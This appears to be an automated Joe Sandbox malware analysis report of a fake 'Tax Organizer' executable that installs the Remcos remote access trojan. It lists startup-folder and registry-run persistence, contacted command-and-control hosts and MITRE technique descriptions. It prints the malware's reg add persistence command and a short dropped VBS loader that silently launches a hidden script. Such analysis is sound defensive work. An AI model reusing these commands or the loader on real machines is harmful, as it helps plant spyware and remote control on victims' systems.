Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Windows Shell Script Host drops VBS files

Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\Start Menu\Programs\Startup\FDNUA.vbs
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\Start Menu\Programs\Startup\FDNUA.vbs

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Windows\SysWOW64\reg.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\Start Menu\Programs\Startup\FDNUA.vbs
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\Start Menu\Programs\Startup\WindowsServices-RDGVW.lnk
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\Start Menu\Programs\Startup\FDNUA.vbs
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\Start Menu\Programs\Startup\WindowsServices-RDGVW.lnk

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *Chrome
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *Chrome

Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe

Window / User API: threadDelayed 9812

Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe TID: 4800	Thread sleep count: 78 > 30
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe TID: 4800	Thread sleep time: -234000s >= -30000s
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe TID: 4800	Thread sleep count: 9812 > 30
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe TID: 4800	Thread sleep time: -29436000s >= -30000s

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 148.72.177.212 443

Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe	Process created: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe "C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\HEARTB.dll",EntryPoint /f
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Memory.vbs"
Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Memory.vbs"

Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 0000000D.00000002.1735043470.00000000025A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1755219715.0000000011993000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2490459455.0000000000638000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-DRFJJD

Yara detected Remcos RAT

Source: Yara match	File source: 0000000D.00000002.1735043470.00000000025A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1755219715.0000000011993000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2490459455.0000000000638000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	Valid Accounts	1 Windows Management Instrumentation	211 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	111 Registry Run Keys / Startup Folder	111 Registry Run Keys / Startup Folder	1 Modify Registry	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	13 System Information Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Source	Detection	Scanner	Label	Link
http://geoplugin.net/json.gp	100%	URL Reputation	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dd20fzx9mj46f.cloudfront.net	3.161.193.61	true	false	high
privacycollector-production-457481513.us-east-1.elb.amazonaws.com	3.217.28.88	true	false	high
textbin.net	148.72.177.212	true	true	unknown
widget.uservoice.com	104.17.27.92	true	false	high
api.echosign.com	52.71.63.232	true	false	high
faststaynow.duckdns.org	46.183.222.118	true	true	unknown
geoplugin.net	178.237.33.50	true	false	unknown
cdn-sharing.adobecc.map.fastly.net	151.101.1.138	true	false	unknown
adobetarget.data.adobedc.net	63.140.39.9	true	false	unknown
adobe.com.ssl.d1.sc.omtrdc.net	63.140.39.130	true	false	unknown
www.google.com	142.250.105.105	true	false	high
by2.uservoice.com	104.17.27.92	true	false	high
prod.adobeccstatic.com	99.86.229.114	true	false	unknown
use.typekit.net	unknown	unknown	false	high
c.evidon.com	unknown	unknown	false	high
ims-na1.adobelogin.com	unknown	unknown	false	high
assets.adobedtm.com	unknown	unknown	false	high
l.betrad.com	unknown	unknown	false	high
dc-api-v2.adobecontent.io	unknown	unknown	true	unknown
p.typekit.net	unknown	unknown	false	high
dc-api.adobecontent.io	unknown	unknown	true	unknown
adobe.tt.omtrdc.net	unknown	unknown	true	unknown
cdn-sharing.adobecc.com	unknown	unknown	true	unknown
static.adobelogin.com	unknown	unknown	false	high
files-download2.acrocomcontent.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
about:blank	false		low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.40.205.16	unknown	United States	20940	AKAMAI-ASN1EU	false
151.101.1.138	cdn-sharing.adobecc.map.fastly.net	United States	54113	FASTLYUS	false
23.209.188.7	unknown	United States	9498	BBIL-APBHARTIAirtelLtdIN	false
52.202.204.11	unknown	United States	14618	AMAZON-AESUS	false
46.183.222.118	faststaynow.duckdns.org	Latvia	52048	DATACLUBLV	true
18.235.168.50	unknown	United States	14618	AMAZON-AESUS	false
142.250.105.113	unknown	United States	15169	GOOGLEUS	false
50.16.240.61	unknown	United States	14618	AMAZON-AESUS	false
104.18.32.195	unknown	United States	13335	CLOUDFLARENETUS	false
172.64.155.61	unknown	United States	13335	CLOUDFLARENETUS	false
3.161.193.61	dd20fzx9mj46f.cloudfront.net	United States	16509	AMAZON-02US	false
63.140.39.130	adobe.com.ssl.d1.sc.omtrdc.net	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
148.72.177.212	textbin.net	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
104.18.32.77	unknown	United States	13335	CLOUDFLARENETUS	false
13.226.100.23	unknown	United States	16509	AMAZON-02US	false
44.198.86.118	unknown	United States	14618	AMAZON-AESUS	false
23.22.254.206	unknown	United States	14618	AMAZON-AESUS	false
96.7.225.33	unknown	United States	20940	AKAMAI-ASN1EU	false
23.48.105.219	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.105.94	unknown	United States	15169	GOOGLEUS	false
13.226.100.103	unknown	United States	16509	AMAZON-02US	false
23.11.229.233	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.105.105	www.google.com	United States	15169	GOOGLEUS	false
23.209.188.17	unknown	United States	9498	BBIL-APBHARTIAirtelLtdIN	false
172.253.124.94	unknown	United States	15169	GOOGLEUS	false
104.17.27.92	widget.uservoice.com	United States	13335	CLOUDFLARENETUS	false
23.47.218.150	unknown	United States	16625	AKAMAI-ASUS	false
64.233.185.101	unknown	United States	15169	GOOGLEUS	false
63.140.39.9	adobetarget.data.adobedc.net	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.66.0.163	unknown	United States	13335	CLOUDFLARENETUS	false
44.196.228.180	unknown	United States	14618	AMAZON-AESUS	false
99.86.229.114	prod.adobeccstatic.com	United States	16509	AMAZON-02US	false
52.71.63.232	api.echosign.com	United States	14618	AMAZON-AESUS	false
18.207.85.246	unknown	United States	14618	AMAZON-AESUS	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
184.31.61.57	unknown	United States	16625	AKAMAI-ASUS	false
50.16.103.66	unknown	United States	14618	AMAZON-AESUS	false
3.233.142.19	unknown	United States	14618	AMAZON-AESUS	false
172.217.215.84	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428438
Start date and time:	2024-04-18 23:35:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.win@28/101@44/273

Warnings

Exclude process from analysis (whitelisted): SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.253.124.94, 23.48.105.219, 23.48.105.218, 142.250.105.113, 142.250.105.139, 142.250.105.138, 142.250.105.102, 142.250.105.101, 142.250.105.100, 172.217.215.84, 34.104.35.123, 172.64.155.61, 104.18.32.195, 23.47.218.150, 23.47.218.170, 96.7.225.33, 96.7.225.25, 23.209.188.17, 23.209.188.13, 23.40.205.16, 23.40.205.50, 18.235.168.50, 44.198.86.118, 52.202.204.11, 23.22.254.206, 52.5.13.197, 54.227.187.23, 172.66.0.163, 162.159.140.165, 3.233.142.19, 44.196.228.180, 104.18.32.77, 172.64.155.179, 23.194.116.10, 23.194.116.6, 184.31.61.57, 50.16.240.61, 52.55.37.80, 52.207.38.44, 52.72.20.72, 44.218.120.116, 54.158.100.91, 18.207.85.246, 54.144.73.197, 34.193.227.236, 107.22.247.231, 23.11.229.233, 23.11.229.163, 23.209.188.7, 13.226.100.23, 13.226.100.103, 13.226.100.58, 13.226.100.91
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5

Process:	C:\Users\user\Downloads\2023 Tax Organizer\Tax Organizer 2023\Tax Organizer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.995620093649274
Encrypted:	false
SSDEEP:
MD5:	334018F02CE31BCBB4864D602B557FE5
SHA1:	C6DE43E8D6B5C026C0B0A56A898A3F00B282B881
SHA-256:	F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
SHA-512:	31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB
Malicious:	false
Reputation:	unknown
Preview:	{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 18 20:36:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9924590726752753
Encrypted:	false
SSDEEP:
MD5:	021DE06528D4CFD6E59C446E3389F030
SHA1:	0CC4C25893F3320710C5D18DD918334829770A21
SHA-256:	B0A9E21299F9BD75E25D62E2299FC959B4AA7B58182460A7F7BE3A0E01AF3E7D
SHA-512:	A61B151A11750369E1D74339D43245805632BC7C06EDE5A180EF38C4EFD59AA0E7D2CF3086DBDA78D0D27C0D4C241D163C057B304C0A0212DA8729C6B2E0E3D9
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......x...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............9.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	276
Entropy (8bit):	5.247335680454147
Encrypted:	false
SSDEEP:
MD5:	0F6FB21DA68A3C96727F7B3F41C6396E
SHA1:	556AF81855F434E38AD4A48A99F1C026EE7490D8
SHA-256:	5819DD543E8A14F37C805762DCD5A5D29D7DAD9FF8C16041605576CAB4FB2FD0
SHA-512:	26CA306248DCD8AF7E02CAD85058823B6F46A49D0AF6264311D096DD942471CA151B6978A813270B3858E3309F55313006422A836FCDF11BD56042513C2FBD9B
Malicious:	false
Reputation:	unknown
Preview:	on error resume next..Set UJMIL = WScript.CreateObject("WScript.Shell")..APPDATA = UJMIL.ExpandEnvironmentStrings("%appdata%\WindowsServices")..WScript.Sleep(3000).. Set EMPYA = CreateObject("Shell.Application")..EMPYA.ShellExecute APPDATA & "\VJQSJ.cmd", "", APPDATA, "", 0..

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

E-Banking Fraud

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\json[1].json

C:\Users\user\AppData\Local\Temp\Memory.vbs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

